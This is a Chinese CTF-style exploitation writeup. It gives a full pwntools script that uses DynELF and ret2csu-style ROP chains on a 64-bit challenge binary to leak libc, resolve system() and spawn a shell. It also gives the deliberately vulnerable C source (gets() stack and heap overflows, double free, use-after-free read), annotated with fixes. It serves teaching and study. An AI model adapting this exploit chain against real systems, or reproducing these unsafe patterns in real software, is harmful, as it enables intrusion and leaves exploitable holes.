
这几天有同学问我在64位下怎么用这个函数，于是针对同一道题写了个利用 DynELF 的方法。

编译好的程序 http://pan.baidu.com/s/1jImF95O

源码在后面

from pwn import *

# Exploit script from the writeup, written for Python 2 (print statements,
# str payloads, str.encode('hex')); it does not run unmodified on Python 3.
# Every address below is hard-coded for this particular build of ./pwn_final
# (GOT entries come from the ELF, the rest are literal constants).
elf = ELF('./pwn_final')
got_write = elf.got['write']
print 'got_write= ' + hex(got_write)
call_get_name_func = 0x400966
print 'call_get_name_func= ' + hex(call_get_name_func)
got_read = elf.got['read']
print "got_read: " + hex(got_read)
bss_addr = 0x6020c0
pad = 'a'
p = process('./pwn_final')
gdb.attach(p)  # attach a debugger to the freshly spawned process

# get system address
def leak(address):
    # Leak callback handed to DynELF. Each call waits for the name prompt,
    # overflows the 40-byte `name` buffer in get_name() (see the C source:
    # gets() has no bound) with 56 bytes of padding, and then supplies a
    # return chain that makes the program write() the memory at `address`
    # back to us. Defensive note: replacing gets() with a bounded read
    # (fgets(name, sizeof name, stdin)) removes this primitive entirely.
    p.recvuntil('please enter your name:')
    payload1 = pad * 56
    # The 0x400d.. values are return targets inside the binary and the words
    # between them are the register contents those targets pick up;
    # got_write / 128 / address are the write() arguments. The exact
    # register mapping is not visible from this script - confirm in gdb.
    payload1 += p64(0x400d9a)+ p64(0) + p64(1) + p64(got_write) + p64(128) + p64(address) + p64(1) + p64(0x400d80)
    payload1 += "\x00"*56
    # Presumably (per its name) the call to get_name() in main, so the
    # prompt comes back and the next leak can reuse the same overflow.
    payload1 += p64(call_get_name_func)
    p.sendline(payload1)
    data = p.recv(128)
    # `data or ''` guards the hex dump against an empty recv(); DynELF gets
    # the raw bytes.
    print "%#x => %s" % (address, (data or '').encode('hex'))
    return data

# Resolve system() in the target's libc through the leak callback alone -
# no libc binary or version is required by this script.
d = DynELF(leak, elf=ELF('./pwn_final'))
system_addr = d.lookup('system', 'libc')
print "system_addr=" + hex(system_addr)

# write system && /bin/sh
# Second chain: have the program read() 16 bytes from stdin into .bss at
# bss_addr, then send those 16 bytes - the resolved system address followed
# by the NUL-terminated string "/bin/sh".
payload2 = "a"*56
payload2 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(got_read) + p64(16) + p64(bss_addr) + p64(0) + p64(0x400d80)
payload2 += "\x00"*56
payload2 += p64(call_get_name_func)
p.sendline(payload2)
p.send(p64(system_addr))
p.send("/bin/sh\0")
p.recvuntil('name:')

# call system
# Third chain: call through the pointer now stored at bss_addr, with
# bss_addr+8 (where "/bin/sh" was written) as the argument, then hand the
# terminal to the user.
payload3 = "a"*56
payload3 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(0) + p64(0) + p64(bss_addr+8) + p64(0x400d80)
payload3 += "\x00"*56
payload3 += p64(call_get_name_func)
p.sendline(payload3)
p.interactive()

源码

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

/*
 * Source of the challenge binary (pwn_final) used by the writeup above.
 * The program is deliberately vulnerable; the comments mark each weakness
 * and the usual fix, while the code is left exactly as published so the
 * writeup's payloads still match its stack layout.
 */
void print_menu();
void get_name();
void add_paper();
void delete_paper();
void show_paper();
int get_num();
void get_input(char *buffer, int size, int no_should_fill_full);
void gg();

/* Table of heap buffers, indexed 0-9 by the menu functions. Entries are
 * never reset to NULL after free() (see delete_paper), so a slot may hold a
 * dangling pointer. */
char *link_list[10];

/* Entry point: disables stdio buffering, reads a name, then loops over the
 * menu until a choice other than 1-3 is entered. */
int main()
{
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    setbuf(stderr, 0);
    int choice;
    get_name();  /* unbounded gets() into a 40-byte stack buffer, see get_name */
    while (1){
        print_menu();
        choice = get_num();
        switch (choice){
        case 1:
            add_paper();
            break;
        case 2:
            delete_paper();
            break;
        case 3:
            show_paper();
            break;
        default:
            /* `return;` without a value in a function declared int: a
             * constraint violation that compilers accept with a warning;
             * main yields no defined exit status here. */
            return;
        }
    }
    /* Unreachable: the loop above only leaves via the return in `default`. */
    printf("thank you!");
}

/* Read a line and parse it as an integer with strtol(); re-prompts
 * (recursively) while the input does not start with a number.
 * get_input() may store all 48 bytes without a terminating NUL (see
 * get_input), in which case strtol() and the printf("%s") read past
 * `input`; on EOF nothing is stored and `input` is uninitialized, so the
 * recursion may not terminate. */
int get_num()
{
    int result;
    char input[48];
    char *end_ptr;
    get_input(input, 48, 1);
    result = strtol(input, &end_ptr, 0);
    if (input == end_ptr){
        printf("%s input is not start with number!\n", input);
        result = get_num();
    }
    return result;
}

/* Read up to `size` bytes from stdin into `buffer`, one byte per fread().
 * With no_should_fill_full set, a newline after at least one stored byte
 * ends the input and is replaced by NUL; a leading newline takes neither
 * branch and is simply overwritten on the next iteration. When `size` bytes
 * have been stored, or fread() returns 0, the loop ends WITHOUT writing a
 * NUL terminator, so the caller cannot treat `buffer` as a C string in
 * those cases. */
void get_input(char *buffer, int size, int no_should_fill_full)
{
    int index = 0;
    char *current_location;
    int current_input_size;
    while (1){
        current_location = buffer+index;
        current_input_size = fread(buffer+index, 1, 1, stdin);
        if (current_input_size <= 0)
            break;
        if (*current_location == '\n' && no_should_fill_full){
            if (index){
                *current_location = 0;
                return;
            }
        }else{
            index++;
            if (index >= size)
                break;
        }
    }
}

/* Prompt for a name. gets() has no bound, so input longer than 40 bytes
 * overwrites the rest of the stack frame, including the saved return
 * address - this is the overflow the writeup's payloads use (56 bytes of
 * padding followed by return addresses). Fix: fgets(name, sizeof name,
 * stdin), or the bounded get_input() that already exists in this file. */
void get_name()
{
    char name[40];
    printf("please enter your name:");
    gets(name);
}

/* Print the menu banner and the three numbered options. */
void print_menu()
{
    puts("Welcome to use the improved paper management system!");
    puts("1 add paper");
    puts("2 delete paper");
    puts("3 show paper");
}

/* Write `length` bytes of paper `index` to the output.
 * - scanf() results are unchecked: on non-numeric input `index`/`length`
 *   stay uninitialized.
 * - write(2) takes an int descriptor, but the FILE* `stdout` is passed;
 *   compilers warn about the implicit pointer-to-int conversion.
 * - `length` is only bounded by 2048, never by the size allocated in
 *   add_paper(), and link_list[index] may be NULL (never added) or already
 *   freed: an out-of-bounds / use-after-free heap read that discloses
 *   memory. Fix: store each buffer's length next to its pointer and clamp
 *   to it, and reject NULL slots. */
void show_paper()
{
    int index;
    int length;
    printf("Input the index of the paper you want to show(0-9):");
    scanf("%d", &index);
    if (index < 0 || index > 9)
        exit(1);
    printf("How long you will enter:");
    scanf("%d", &length);
    if (length < 0 || length > 2048)
        exit(1);
    write(stdout, link_list[index], length);
}

/* Allocate `length` bytes for slot `index` and fill them with gets().
 * gets() is unbounded, so content longer than `length` overflows the heap
 * chunk; length 0 passes the check and yields malloc(0); a buffer already
 * in the slot is overwritten without free() (leak); scanf() results are
 * unchecked as in show_paper(). Fix: fgets(link_list[index], length, stdin)
 * or get_input(link_list[index], length, 1). */
void add_paper()
{
    int index;
    int length;
    printf("Input the index you want to store(0-9):");
    scanf("%d", &index);
    if (index < 0 || index > 9)
        exit(1);
    printf("How long you will enter:");
    scanf("%d", &length);
    if (length < 0 || length > 2048)
        exit(1);
    link_list[index] = malloc(length);
    if (link_list[index] == NULL)
        exit(1);
    printf("please enter your content:");
    gets(link_list[index]);
    printf("add success!\n");
}

/* free() the buffer in slot `index`. The slot is not set to NULL
 * afterwards, so deleting the same index twice is a double free and
 * show_paper() can still read the freed chunk. free(NULL) on a never-used
 * slot is harmless. Fix: `link_list[index] = NULL;` after the free(). */
void delete_paper()
{
    int index;
    printf("which paper you want to delete,please enter it's index(0-9):");
    scanf("%d", &index);
    if (index < 0 || index > 9)
        exit(1);
    free(link_list[index]);
    puts("delete success !");
}

/* Never called from main(), but compiled into the binary. Same FILE*-as-fd
 * mistake as show_paper(): read(2) wants a descriptor and `stdin` is a
 * FILE*. Reads up to 40 bytes into a 40-byte buffer with no NUL terminator. */
void gg()
{
    char name[40];
    read(stdin, name, 40);
}